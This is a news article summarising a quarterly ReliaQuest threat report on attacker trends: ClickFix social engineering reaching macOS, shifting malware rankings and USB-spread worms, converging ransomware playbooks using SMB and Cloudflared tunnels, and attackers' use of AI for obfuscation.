ReliaQuest has published quarterly research showing that cyber attackers are increasingly achieving their aims by abusing trusted identities, devices and tools rather than relying on malicious code. The analysis covers activity observed between March and May.
The findings suggest a continued shift in attacker tradecraft, with social engineering and the exploitation of unpatched internet-facing systems emerging as the two main routes into organisations. This is the third consecutive reporting period in which those patterns have held, even as the malware families and ransomware brands involved have changed.
At the centre of the report is ClickFix, which emerged as the dominant delivery technique during the quarter. The method uses social engineering to persuade users to paste attacker-supplied commands into trusted system tools, allowing attackers to bypass conventional file-scanning and perimeter defences.
ClickFix accounted for 14.9% of initial access activity in the incidents examined and nearly 28% of defence-evasion activity. The technique has moved beyond its earlier status as an emerging threat and should now be treated as a regular feature of the threat landscape.
Researchers also observed ClickFix reach macOS for the first time. In one example highlighted in the study, attackers used an AppleScript link to open Script Editor on Apple devices and run malicious commands there, extending a delivery method already widely seen on Windows systems.
That shift matters because many organisations still monitor Apple devices less closely than Windows estates. Moving to macOS did not change the underlying objective: stealing browser credentials, session cookies, crypto wallets and keychain data.
Malware churn
The malware rankings changed sharply during the quarter. Last period’s leading families, BaoLoader, Shai-Hulud and RemcosRAT, all dropped out of the top three. They were replaced by Gamarue, NetSupport RAT and Raspberry Robin.
The pace of turnover suggests defenders can no longer rely on name-based tracking to understand attacker behaviour. Instead, security teams should focus on recurring methods such as abuse of legitimate remote tools and the spread of malware through removable media.
Two of the top three malware families identified during the period spread through USB devices or other removable media. That finding reinforces a pattern ReliaQuest has previously described as “seasonal USB”, in which infections linked to removable media rise during predictable periods such as US tax season and first-quarter financial reporting.
With removable media once again appearing among the top initial access techniques, the pattern now appears persistent rather than temporary. The report identified Gamarue as an older modular worm that spreads through malicious shortcut files and autorun entries, while Raspberry Robin was described as another worm used to broker access for ransomware operators.
Ransomware trends
In ransomware, Qilin was the most active group in the quarter, claiming 700 victims and remaining ahead of The Gentlemen, DragonForce, Akira and Inc Ransom. More significant, however, was the growing convergence of methods among the leading extortion groups.
Rather than relying on distinct techniques, the top operators were found to be using a similar playbook: exploiting unpatched edge devices, using Cloudflared tunnels for command and control, and deploying encryption through single-host Server Message Block activity. That common approach mattered more than which group name happened to top a leak site.
Lateral movement data underlined the point. Server Message Block and Windows Admin Shares overtook Remote Desktop Protocol as the leading lateral movement method, with SMB activity rising to 36% from a previous baseline of about 12%.
In many cases, encryption was launched from a single trusted host, leaving limited suspicious activity on the victim machines themselves. That shifts detection away from malicious files on endpoints and towards unusual network and identity behaviour, such as bulk SMB writes to administrative shares from machines that do not usually perform management tasks.
Trusted access
Across initial access, defence evasion and lateral movement, the report identified a common thread: attackers using channels organisations already trust. Spearphishing became the top initial access technique as campaigns shifted from compromised websites to emailed lures, while domain account abuse remained a major path into enterprise systems.
In defence evasion, masquerading through legitimate-looking names and locations was one of the leading techniques. Attackers are increasingly disguising tools, files and processes as ordinary software, making conventional known-bad file lists less useful than behavioural monitoring.
ReliaQuest also said artificial intelligence is helping attackers make familiar social-engineering methods faster, cheaper and more convincing rather than creating wholly new tactics. It pointed to one ClickFix loader that used likely AI-generated obfuscation to hide its real logic beneath large volumes of meaningless code.
Sector analysis showed named victim counts falling across most industries for a fourth straight period, although professional, scientific and technical services remained the most targeted sector. That decline should not be read as a reduction in risk, because the market appears to be consolidating around fewer but more disciplined and more damaging operators.
“Attackers are reaching their goals by abusing trust, not breaking it,” ReliaQuest said.
Click Here For The Original Source.
